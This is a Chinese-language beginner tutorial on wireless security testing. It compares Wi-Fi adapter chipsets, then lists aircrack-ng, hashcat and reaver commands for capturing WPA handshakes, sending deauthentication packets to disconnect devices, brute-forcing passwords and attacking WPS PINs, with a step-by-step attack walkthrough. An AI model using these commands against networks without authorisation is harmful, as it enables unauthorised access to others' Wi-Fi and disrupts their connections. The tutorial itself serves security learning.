From ChaMd5安全团队核心成员 sherlly
很久之前就想出一套无线安全系列的文章,一方面,总结自己学习过程踏过的坑,另一方面,也算是和大家分享自己的学习心得,由于文章主要面向初学者,所以语言会比较浅显,文章有错误的或者是不足的地方希望大家指出,谢谢。
回想刚入门的时候,硬件这块不得不说是第一个坑了,网上给的建议大多参差不齐,也没有一个很好的标准,下面总结一下选择时考虑的因素:
芯片型号 | 无线网卡 | 功率大小 | 价格参考(Amazon/Taobao) |
---|---|---|---|
Atheros AR9271 | Alfa AWUS036NHA | 150Mbps | $55.00/¥275+ |
TP-Link TL-WN722N | 150Mbps | $13.71/¥100+ | |
TP-Link TL-WN822N | 300Mbps | $14.99/¥120+ | |
Realtek RTL8187L | Alfa AWUS036H | 1000MW | $34.99/¥60-200+ |
Ralink RT3070 | Alfa AWUS036NH | 2000MW | $39.99/¥160-255+ |
个人推荐TPLink的TL-WN722N,在旧版kali免装驱动完美识别,自带一根4dBi天线,可更换。当然,如果只是想尝尝鲜,完全可以去某宝买一个杂牌的,搜索时只搜索芯片型号就可以,如:AR9271
airmon-ng check kill //清理可能与aircrack-ng争用无线网卡的进程
airmon-ng start <interface> //无线网卡开启监听模式
airmon-ng stop <interface> //关闭无线网卡
airodump-ng <interface> //查看周围wifi热点
airodump-ng -c 6 --bssid AA:AA:AA:AA:AA:AA -w <save file> //抓取在频道6且bssid为AA:AA:AA:AA:AA:AA的路由器的握手包并保存
aireplay-ng <options> <replay interface>
常用:
aireplay-ng -0 6 –a <ap mac> -c <device mac> <interface> //发送6个deauth(反认证)包强制断开目标设备的wifi连接
aircrack-ng -a2 -b AA:AA:AA:AA:AA:AA -w <dict file> <cap file> //a2表示类型为WPA的握手包,w后是爆破需要的字典文件,最后是已经捕捉到的握手包路径
aircrack-ng src.cap -J out.hccap //捕捉到的握手包.cap转换为.hccap,方便后续Hashcat破解
airbase-ng -e sherlly -c 6 <interface> //为网卡创建一个essid为'sherlly',频道为6的WiFi热点
hashcat64.exe -m 2500 -a3 sherllys.hccap ?d?d?d?d?d?d?d?d //破解密码为8位数字的握手包
hashcat64.exe -2 ?d?l -m 2500 -a3 sherlly.hccap ?2?2?2?2?2?2?2?2 //破解密码为8位数字加小写字母的握手包
hashcat64.exe -m 2500 sherlly.hccap pwd.txt //通过字典文件破解握手包
参数说明:
1. 暴力破解字符集选择:
?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xffwash –i <interface> –C //探测开启wps认证的AP
reaver -i <interface> -b AA:AA:AA:AA:AA:AA -vv //向bssid为AA:AA:AA:AA:AA:AA的AP发送Pin码
1. 开启kali, 插上无线网卡,检测是否正常识别;
附:TPLINK-WN722N内置AR9271芯片,驱动型号是 ath9k_htc.
2.开启网卡监听模式,并记住设备接口名称,此处为wlan0mon:
3.开始扫描周围AP:
4.针对某一AP发起攻击:
(一)捕获802.11数据报文
(二)强制用户断开wifi重连
这一步是为了加速握手包的获得,注意需要另开终端执行,第一步的操作不要中断。
可以看到已经成功抓取握手包了。
5.关闭网卡监听模式